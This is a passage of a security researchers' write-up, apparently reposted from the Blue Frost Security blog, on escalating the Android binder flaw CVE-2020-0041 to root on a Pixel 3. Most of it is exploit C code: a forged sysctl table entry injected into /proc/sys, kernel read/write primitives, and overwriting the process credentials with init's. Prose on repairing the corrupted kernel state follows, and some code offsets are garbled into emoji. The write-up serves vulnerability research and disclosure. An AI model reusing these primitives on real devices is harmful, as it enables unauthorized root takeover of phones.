*)(ctl_table_uaddr) = procname_kaddr; // procname *(uint64_t *)(ctl_table_uaddr + 😎 = kernel_base; // data == what to read/write *(uint32_t *)(ctl_table_uaddr + 16) = 0x8; // max size *(uint64_t *)(ctl_table_uaddr + 0x20) = proc_douintvec; // proc_handler *(uint32_t *)(ctl_table_uaddr + 20) = 0666; // mode = rw-rw-rw- /* * Compute and write the node name. We use a random name starting with aaa * for two reasons: * * - Must be the first node in the tree alphabetically given where we insert it (hence aaa...) * * - If we already run, there's a cached dentry for each name we used earlier which has dangling * pointers but is only reachable through path lookup. If we'd reuse the name, we'd crash using * this dangling pointer at open time. * * It's easier to have a unique enough name instead of figuring out how to clear the cache, * which would be the cleaner solution here. */ int fd = open("/dev/urandom", O_RDONLY); uint32_t rnd; read(fd, &rnd, sizeof(rnd)); sprintf(procname_uaddr, "aaa_%x", rnd); sprintf(pathname, "/proc/sys/%s", procname_uaddr); /* And finally use a write8 to inject this new sysctl node */ struct exp_node *write8_sysctl = node_new("write8_sysctl"); node_write8(write8_sysctl, kaddr, prev_node + 16); This basically creates one file at /proc/sys/aaa_[random], with read/write permissions, and uses proc_douintvec to handle read/writes. This function will take the data field as the pointer to read from or write to, and allow up to max_size bytes to be read or written as unsigned integers. With this, we can setup a write primitive as follows: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 void write64(uint64_t addr, uint64_t value) { *(uint64_t *)(ctl_table_uaddr + 😎 = addr; // data == what to read/write *(uint32_t *)(ctl_table_uaddr + 16) = 0x8; char buf[100]; int fd = open(pathname, O_WRONLY); if (fd < 0) { printf("[!] Failed to open. Errno: %d\n", errno); } sprintf(buf, "%u %u\n", (uint32_t)value, (uint32_t)(value >> 32)); int ret = write(fd, buf, strlen(buf)); if (ret < 0) printf("[!] Failed to write, errno: %d\n", errno); close(fd); } void write32(uint64_t addr, uint32_t value) { *(uint64_t *)(ctl_table_uaddr + 😎 = addr; // data == what to read/write *(uint32_t *)(ctl_table_uaddr + 16) = 4; char buf[100]; int fd = open(pathname, O_WRONLY); sprintf(buf, "%u\n", value); write(fd, buf, strlen(buf)); close(fd); } Getting root and cleaning up Once we have read/write capabilities on a Pixel phone, obtaining root access is as simple as copying the credentials from a root task. Since we have already disabled SELinux earlier, we just need to find the init credentials, bump their reference count and copy them to our process like this: 1 2 3 4 5 6 7 8 9 /* Set refcount to 0x100 and set our own credentials to init's */ write32(init_cred, 0x100); write64(current + REAL_CRED_OFFSET, init_cred); write64(current + REAL_CRED_OFFSET + 8, init_cred); if (getuid() != 0) { printf("[!!] Something went wrong, we're not root!!\n"); goto out; } However this is not enough to enjoy a root shell yet, since we have corrupted quite some memory in kernel land and things will break as soon as we exit the current process and execute the shell. There are a few things that we need to repair: The binder_node structures we used to perform write primitives were reallocated through sendmsg, but have been freed again when performing the write. We need to make sure the corresponding threads do not free these objects again upon returning from sendmsg. For that, we parse the thread stacks and replace any references we find to these nodes by ZERO_SIZE_PTR. We have modified the f_inode of a struct file, which now points into the middle of an epitem. The easiest way around this is to simply bump the reference count for this file such that release is never called on it. While setting up the read primitive, we also corrupted a field in the epitem itself. This field was a linked list with one epitem only, so we can just copy the fllist.prev field on top of fllist.next to restore the list. We also added a fake entry to /proc/sys, which we could leave around ... but in that case it'd be pointing to pages that belonged to our exploit and are now recycled by the kernel. We decided to just remove it from the rb-tree. Note that this makes the entry disappear from the userland view, but there is still a cached path in the kernel. Since we used a randomized name, chances are small that anybody would try to access it in the future by directly opening it. After cleaning all this mess up, we can finally execute our root shell and enjoy uid 0 without a crashing phone. Demonstration video The following video shows the process of rooting the phone from an adb shell using the exploit we just described: Code You can find the code for the exploits described in this and the previous post at the Blue Frost Security GitHub. The exploit has only been tested on a Pixel 3 phone using the firmware from February 2020, and would need to be adapted for other firmwares. In particular there are a number of kernel offsets used in the exploit, as well as structure offsets that may vary between kernel versions. Sursa: https://labs.bluefrostsecurity.de/blog/2020/04/08/cve-2020-0041-part-2-escalating-to-root/
×
×
  • Create New...